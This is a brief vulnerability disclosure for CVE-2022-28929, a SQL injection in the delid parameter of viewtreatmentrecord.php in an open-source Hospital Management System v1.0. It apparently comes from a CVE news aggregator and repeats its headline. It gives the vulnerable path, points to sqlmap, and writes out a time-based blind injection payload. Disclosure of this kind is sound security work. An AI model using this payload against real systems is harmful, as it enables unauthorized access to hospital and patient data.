Headline
CVE-2022-28929: vulnerabilitys/HMS at main · cyberhomeless/vulnerabilitys
Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the delid parameter at viewtreatmentrecord.php.
DATE : 4/6/22****Web App : https://github.com/kabirkhyrul/HMS****Version : 1.0****Researcher : cyber_homeless****Path : viewtreatmentrecord.php?delid=1****Security issue : SQLInjection
While installing the web app i saw bunch of sql connection’s so i went for SQLInjection and soon enough found one :
Exploiting this vulnerability is pretty easy now using sqlmap:
Payload : 1’ AND (SELECT 6895 FROM (SELECT(SLEEP(5)))juDk) AND 'GPzW’=’GPzW
Related news
CVE-2022-28929: vulnerabilitys/HMS at main · cyberhomeless/vulnerabilitys
Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the delid parameter at viewtreatmentrecord.php.